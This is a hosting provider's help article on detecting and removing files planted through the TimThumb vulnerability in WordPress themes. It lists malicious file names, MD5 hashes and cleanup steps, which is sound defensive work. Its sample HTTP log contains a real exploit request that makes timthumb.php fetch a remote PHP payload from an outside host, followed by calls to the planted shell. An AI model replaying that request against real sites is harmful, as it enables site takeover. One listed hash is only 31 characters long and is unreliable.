WordPress Compromise: TimThumb

TimThumb is a tool used by WordPress themes and plugins to resize images. Old versions of TimThumb have a security vulnerability that lets attackers upload malicious ("bad") files from another website. The first bad file then lets the attacker upload more malicious files to the hosting account.

You can get more information about compromises and how to deal with them in What if my website is hacked?.

Signs You've Been Compromised

Besides the signs mentioned in What if my website is hacked?, you can tell your site has been affected by this specific compromise if your account contains the files with the following patterns in a plugin directory:

  • external_[md5 hash].php — for example: external_dc8e1cb5bf0392f054e59734fa15469b.php
  • [md5 hash].php — for example: 7eebe45bde5168488ac4010f0d65cea8.php

You can find examples of possible md5 hashes in the MD5SUMS of Known Malicious Files section of this article.

You might also find the following files in your website's root directory (more info):

  • x.txt
  • logx.txt

Remedies

You must remove all of the compromised and bad files. Before deleting anything, we recommend making a backup of your website (more info).

Locating Bad Files

The bad files that are initially uploaded through the TimThumb vulnerability will typically be located in one of the following directories, which are located in the /theme or /plugin directory that contains the vulnerable TimThumb file.

  • /tmp
  • /cache
  • /images

Examples of bad files' locations:

[webroot]/wp-content/themes/[theme with vulnerable TimThumb]/cache/images/

Examples of bad files' names in these locations:

  • ef881b33fba49bd6ad1818062d071a9c.php
  • db648d44074f33a8857066b97290d247.php
  • 3cf739debc9340540c923bbf3b73044b.php
  • dc33a2e36d3179a06278191088c2ef35.php
  • 8377cb73d30655dc2cbf906c9310da56.php
  • eb117b212e2906f52c0a0c9132c6c07a.php
  • a4924ec23939d2410354efbb8d4ddd06.php
  • vvv3.php
  • ea90e1e4d7ba30848f70b13d616c6ed4.php
  • 236268f2a06e4153365b998d13934eb9.php
  • 6a4fa516943e2fa09e3704486075de9f.php
  • 896c4eb4ff2581f6e623db1904b80a44.php
  • wp-images.php

The files x.txt and logx.txt will contain information about when a bad file was created using the TimThumb vulnerability and the location of the bad file within the hosting account. This information is helpful in determining what files need to be removed and where to find them. However, it is not likely that this will provide a complete list of files that need to be removed.

An example:

Day : Thu, 11 Apr 2013 06:21:15 -0700
IP: X.X.X.X
Browser: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Url: /wp-content/themes/[theme with vulnerable TimThumb]/cache/images/2817f389ac8b52527a0c5e4aabb464aa.php?clone

Files to Remove

After you've create a backup of your site, remove the following files:

  • x.txt
  • logx.txt
  • external_[md5 hash].php — for example: external_dc8e1cb5bf0392f054e59734fa15469b.php
  • [md5 hash].php — for example: 7eebe45bde5168488ac4010f0d65cea8.php
  • Other malicious PHP files found with the md5 hash named files.

You can do this via FTP (more info) or through the file manager within the control panel for your hosting account (more info).

You should also:

  • Update all of your themes and plugins to the latest version.
  • Replace any instance of TimThumb.php with the newest version found athere.

Technical Info

Sample of HTTP Logs

x.x.x.x - - [27/Apr/2014:08:04:22 -0700] "GET SampleSite.tld/wp-content/themes/[theme with vulnerable TimThumb]/framework/timthumb.php?src=http%3A%2F%2Fimg.youtube.com.bargainbookfinders.com%2Fsempak.php HTTP/1.1" 200 1018 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.s - - [27/Apr/2014:08:04:23 -0700] "GET SampleSite.tld/wp-content/themes/[theme with vulnerable TimThumb]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php?clone HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:26 -0700] "GET SampleSite.tld/wp-includes/wp-script.php HTTP/1.1" 404 36841 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:28 -0700] "GET SampleSite.tld/wp-content/themes/[theme with vulnerable TimThumb]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:30 -0700] "GET SampleSite.tld/wp-content/themes/[theme with vulnerable TimThumb]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"

MD5SUMS of Known Malicious Files

  • 2c4bcdc6bee98ed4dd55e0d35564d870
  • 10069c51da0c87ad904d602beb9e7770
  • 8855aecb5c45a5bfd962b4086c8ff96a
  • 526a4cf1f66f27a959a39019fdf1fae9
  • 161d2e53c664bd0fe1303017a145b413
  • 39f186a0f55b04c651cbff6756a64ccc
  • f67ca8f0bac08f5e8ccab6013b7acf70
  • 747c7afcda0eef0eff6ed6838494c32
  • cfdf59a58057b62f4707b909bcbd4577

Additional Malicious Files

  • wp-script.php
  • wp-images.php
  • vvv3.php
  • data.php

Was This Article Helpful?
Thank You For Your Feedback
Glad we helped! Anything more we can do for you?
Sorry about that. How can we be more helpful?